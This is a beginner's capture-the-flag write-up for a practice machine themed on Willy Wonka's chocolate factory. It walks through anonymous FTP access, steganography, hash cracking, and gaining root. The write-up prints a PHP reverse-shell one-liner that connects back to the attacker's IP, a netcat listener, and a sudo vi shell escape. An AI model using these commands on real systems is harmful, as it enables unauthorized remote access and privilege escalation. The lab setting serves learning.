Chocolate Factory — CTF WriteUp

Hello ctf gamers, once again we are going to complete a themed CTF. We are invited to Willy Wonka’s chocolate factory.

Let’s get started:

Deployed the machine and ready to enumerate.

After an Nmap scan, i found these ports open:

The first thing i did was to access the website

I have to find credentials. Let's go back to what information we have about the system. SSH? No, we don't have any key or any credentials to be able to login. FTP? Well yes, it supports Anonymous login so we have something

ftp [ip address] → when prompted to enter username you just type anonymous

In the FTP i found an image. I download it, and then used exiftool to see if there was anything useful. It had nothing. Then i used steghide without a password to extract information.

Got an encrypted base64 text

Steghide results

Using a base64 decryption, it gave me a hash. I used JohnTheRipper to crack the hash.

Hash from decryption

john — wordlist= /usr/share/wordlists/rockyou.txt /root/Desktop/factoryhash.txt

From cracking the hash i found the password for the user Charlie. I logged in the website using the credentials.

It looks like i can execute commands through the website.

As a beginner I started trying to find a way to access files through the execute button in the website, but I failed, i didn’t thought of using reverse shell. But after a little searching I found this website.

I knew that the website used php, so I used a php reverse shell.

php -r ‘$sock=fsockopen(“<YOUR IP>”,<PORT>);popen(“/bin/sh -i <&3 >&3 2>&3”, “r”);’

I started listening to port 4444 using netcat

nc -lvnp 4444

I pasted the reverse shell in the “Command” section of the website. and pressed “Execute”. I got in but with limited privileges and mobility.

I searched in the directories. In /home/charlie directory I found these 3 files.

I tried to cat user.txt but I didn’t have enough privileges. Then I used cat to read the teleport file and it was an RSA file. Then I used that RSA file to connect through SSH. And it was successful.

I went to the /Charlie directory to read the user.txt file. And it was the user’s flag

Now to find the root flag I have to be root. I used sudo -l to see my privileges

We can use vi. I’ve searched for a way to use vi with root privileges and i found this command

sudo vi -c ‘:!/bin/sh’ /dev/null

And with that I had root privileges, i went to the root folder and found a python file “root.py”. I used python root.py and the file asked for the key.

I pasted it and…

Below this text it’s the flag. And we are Done!!

Cybersecurity / Computer Security student. Writing is the best way to learn. Forever No0B